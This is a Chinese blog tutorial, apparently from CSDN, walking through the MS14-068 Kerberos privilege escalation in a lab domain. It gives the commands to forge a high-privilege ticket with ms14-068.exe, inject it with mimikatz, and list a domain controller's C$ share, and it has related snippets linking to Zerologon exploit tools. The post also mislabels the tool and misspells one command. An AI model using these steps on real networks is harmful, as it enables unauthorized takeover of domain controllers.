域用户提权

最新推荐文章于 2024-07-11 21:49:06 发布
最新推荐文章于 2024-07-11 21:49:06 发布
阅读量3.6k 收藏 3
点赞数 1
分类专栏: 内网渗透 文章标签: 系统安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuxinweii/article/details/121461492
版权

MS14-068漏洞利用

什么是MS14-068漏洞?

在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。
ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。
该漏洞允许任何一个域普通用户,将自己提升至域管理员权限。微软给出的补丁号kb3011780。
MS14-068是非常经典的一个域用户提权漏洞,所以现在很少能碰到该漏洞。

注:这里准备一个域环境和一个域用户模拟该漏洞利用

一、登录用户收集信息
1.whoami /user查看域用户id
在这里插入图片描述
2.查看域控制器IP
systeminfo查看IP和打过的补丁(主要查看有没有kb3011780补丁)
在这里插入图片描述
二、利用MS16-068获取高权限票据
1.将ms16-068利用工具传达域内一台机器
在这里插入图片描述
2.输入 ms16-068.exe -u 域用户@域名 -s 域成员 sid -d 域控制器地址 -p 域成员密码获取高权限票据
在这里插入图片描述

票据生成成功)
3.注入高权限票据

在mimikatz输入 kerberos::purge清除所有票据,以免对下面的利用产生影响
再输入kerveros::ptc 票据名称注入

在这里插入图片描述
(注入成功)
三、利用该漏洞获取域控信息
输入 dir \\域控主机名\c$
查看域控机器文件
在这里插入图片描述

CVE-2020-1472 利用(
墨痕诉清风的博客
01-25 2419
控(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
MS14-068 (CVE-2014-6324)用户漏洞
李火火的安全圈
03-15 7829
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个内的普通账户可以利用此漏洞进行升,升级为管理员限。 二、漏洞原理 Kerberos认证原理:http
简单的内的
最新发布
m0_74326506的博客
07-11 2497
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
用户 MS14-068(CVE-2014-6324)
qq_46635165的博客
11-17 945
环境 & 工具: win2008 --控 – 192.168.3.133 win2012 --内主机 – 192.168.3.132 :qf.com 内普通用户:sh 密码:123.com pyKEK工具包下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068 应用环境:已拥有一个用户用户名和密码以及该用户的sid,获取了内一台主机的限 1,使用普通用户登录内主机Win2012,
nopac
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 3082
nopac
***之MS14-068
weixin_33728708的博客
01-12 358
0x00 前言 在做***测试时,当遇到环境,获取到一个成员账号后,如果控制器未打好补丁,则可以利用本文所到的漏洞,快速获取到控制器限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。 0x01 准备工作 成员账号及密码一个 mimikatz ms14-068.exe 03以上服务器或pc 0x02 模拟环境 控制器 2008r2 dc.test.co...
WINDOWS 控环境下程序安装包制作程序工具及教程.7z
06-23
WINDOWS 控环境下,普通用户运行应用程序,解决部分应用程序必须以计算机管理员才能运行,本质上也是计算机管理员运行,只是加密了管理员账号密码,普通用户无法直接看到。
内网安全之:Kerberos 用户漏洞(MS14-068;CVE-2014-6324)
f_carey的博客
12-08 2039
郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Kerberos 用户漏洞(MS14-068;CVE-2014-63241 pyKEK 工具包2 MSF 中 ms14_068 利用3 goldenPac.py4 防范 Kerberos MS14-068 漏洞 Microsoft Security Bulletin MS14-068 - Critical.
kerberos-MS14-068(kerberos用户)
Ms08067安全实验室
11-20 336
点击星标,即时接收最新推文微软官方在2014年11月18日发布了一个紧急补丁,Windows全版本服务器系统受到影响,包括Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012和Windows Server 2012 R2,修复了Microsoft Windows Kerberos KDC...
CVE-2021-1675 Windows Print Spooler 漏洞记录
small_cat's home
12-19 300
记录CVE-2021-1675的复现过程
MS14-068AD神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有限 好运~
用户以管理员限运行程序方法.txt
06-29
用户以管理员限运行程序方法,用户运行Everything ,等适用绝大部分程序!!!!!!!!!!!!!
利用dns特性把普通用户升到管理员
一个码农的笔记
10-17 3013
翻译自:https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 翻译人:聂心明 背景 除了使用自己开发的DNS服务器以外,微软还给这个服务器开发了管理协议,用这个协议可以更方便和更集中的管理控服务器。默认情况下,控服务器也是DNS服务器;DNS服务器几乎可访...
普通用户限(管理员的限)
weixin_30443895的博客
05-07 2535
现在大部分公司都使用,运用组策略设置禁止某些软件运行,比如QQ、微信等等; 现在教大家怎么限使用这些软件; 接下来要运用到runas命令,新建一个文档,在文档里面输入 没有加入的:runas /env /savecred /user:administrator “程序路径” 如果加入的:runas /env /savecred /user:domain\administrat...
ms14-068
zz_strive_2012的专栏
06-17 2557
一、利用mimakatz.exe来抓取用户的口令 (1)首先利用ms14-058来得到管理员限 (2)利用mimikatz.exe抓密码 可见抓到的口令。用户zhangsan,口令password1! 二、利用ms14-068工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而
渗透之内网
hackzkaq的博客
11-12 2743
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 在windows中,限种类还是比较多,但我们涉及到的基本就三个 User(普通用户限)、Administrator(管理员限)和system(系统限) 一、方法 常用的方法 系统内核溢出 数据库 错误的系统配置 组策略首选项 DLL劫持 滥用高限令牌 第三方软件/服务 二、内核溢出 电脑里的数据就好比水缸里的水,正常情况下水满了就不会在向水缸里注水 如果继续注入,水就会溢出到外界从而污染外界
环境姿势
懂进攻知防守
08-15 1576
Netlogon升2020年08月12日, 微软官方发布了 NetLogon 特升漏洞 的风险通告。攻击者通过NetLogon(MSNRPC),建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问限。成功利用此漏洞的攻击者。可以在该网络中的设备上运行经特殊设计的应用程序。......
客户机获取hash值
sinat_38378265的博客
04-02 593
总步骤: 将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号,再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache,然后输入klist purge清除所有的票据,然后输入mimikatz.exe “kerbe...
环境
qq_44657899的博客
11-09 3848
文章目录NetLogon特漏洞(CVE-2020-1472)复现 NetLogon特漏洞(CVE-2020-1472)复现 简介 CVE-2020-1472是一个windows控中严重的远程升漏洞,攻击者通过NetLogon,建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-
掌握MS14-068:AD神器使用指南
在这个过程中,首先需要使用Python解释器运行该脚本,并供相应的参数,包括用户用户名(user-a-1@dom-a.loc)、用户的SID(安全标识符,S-1-5-21-557603841-771695929-1514560438-1103)和控制器的全名(dc-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值